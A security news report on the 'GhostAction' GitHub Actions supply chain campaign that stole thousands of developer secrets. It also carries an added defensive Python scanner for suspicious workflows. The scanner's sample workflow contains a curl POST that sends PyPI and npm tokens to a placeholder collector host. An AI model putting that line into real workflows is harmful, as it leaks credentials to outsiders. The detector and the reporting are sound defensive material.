https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen

Security researchers at GitGuardian have uncovered a massive supply chain attack dubbed “GhostAction” that compromised 327 GitHub users across 817 repositories, resulting in the theft of 3,325 sensitive credentials including PyPI, npm, DockerHub tokens, GitHub access keys, and AWS credentials. The campaign, discovered on 5th September 2025, represents one of the largest GitHub-focused supply chain attacks to date, with attackers exploiting GitHub Actions workflows to systematically exfiltrate secrets through malicious HTTP POST requests to remote endpoints controlled by the threat actors.

The attack methodology involved compromising developer accounts and injecting malicious GitHub Actions workflows that were designed to enumerate and extract secrets from legitimate workflow files within targeted repositories. The attackers demonstrated sophisticated reconnaissance capabilities by analysing existing workflow configurations to identify which secrets were in use, then hardcoding those same secret names into their malicious workflows to ensure successful exfiltration. The campaign affected projects across multiple programming languages including Python, JavaScript, Rust, and Go repositories, with DockerHub credentials, GitHub tokens, and npm tokens representing the most commonly stolen secret types.
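As an added illustration that is not part of the GitGuardian report, the following defender-side audit script looks for the pattern described above: a workflow file that references repository secrets by name and, in the same file, pushes data to a host outside an expected allowlist. The workflow texts, the collector hostname and the allowlist are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Matches ${{ secrets.NAME }} expressions anywhere in a workflow file.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# Matches a shell/PowerShell HTTP client invocation followed by a URL on the same line.
HTTP_CALL = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b.*?(https?://[^\s\"']+)", re.IGNORECASE)
# Hosts a release workflow is expected to talk to (assumed allowlist; extend per project).
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org", "index.docker.io"}

@dataclass
class Finding:
    workflow: str
    secrets: list = field(default_factory=list)   # secret names the file references
    urls: list = field(default_factory=list)      # URLs whose host is not allowlisted

def _host(url: str) -> str:
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()

def scan_workflow(name: str, text: str):
    """Return a Finding when a workflow both references secrets and sends to an unexpected host."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    urls = [m.group(2) for line in text.splitlines() for m in HTTP_CALL.finditer(line)
            if _host(m.group(2)) not in ALLOWED_HOSTS]
    if secrets and urls:
        return Finding(name, secrets, urls)
    return None

# Constructed sample modelled on the described pattern: secret names hardcoded and POSTed out.
SUSPICIOUS = """\
name: Github Actions Security
on: [push]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST -d "pypi=${{ secrets.PYPI_TOKEN }}&npm=${{ secrets.NPM_TOKEN }}" https://collector.example.invalid/api
"""
# Constructed benign sample: a secret used only against an allowlisted host.
BENIGN = """\
name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/org/repo/releases
"""

if __name__ == "__main__":
    for name, text in (("suspicious.yml", SUSPICIOUS), ("release.yml", BENIGN)):
        print(name, scan_workflow(name, text))
```

Running it over every file under `.github/workflows/` in a repository, and diffing the set of referenced secret names against those used by the project's known-good workflows, surfaces the hallmark of this campaign: a freshly committed workflow that names exactly the secrets the existing ones already use.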

The GhostAction attack began manifesting publicly on 2nd September 2025, when a GitHub user identified as “Grommash9” committed a malicious workflow file labelled “Github Actions Security” to the FastUUID project, marking the start of what would become a coordinated assault on hundreds of repositories. While investigators found no evidence of malicious package releases during the compromise period despite the theft of PyPI tokens, the stolen npm and PyPI credentials could still be used to publish malicious packages to software registries, creating ongoing supply chain risk. The incident highlights critical weaknesses in DevOps security practices and the increasing sophistication of attacks targeting developer infrastructure, with the stolen credentials potentially providing attackers with access to cloud services, package registries, and private repositories across numerous organisations and projects worldwide.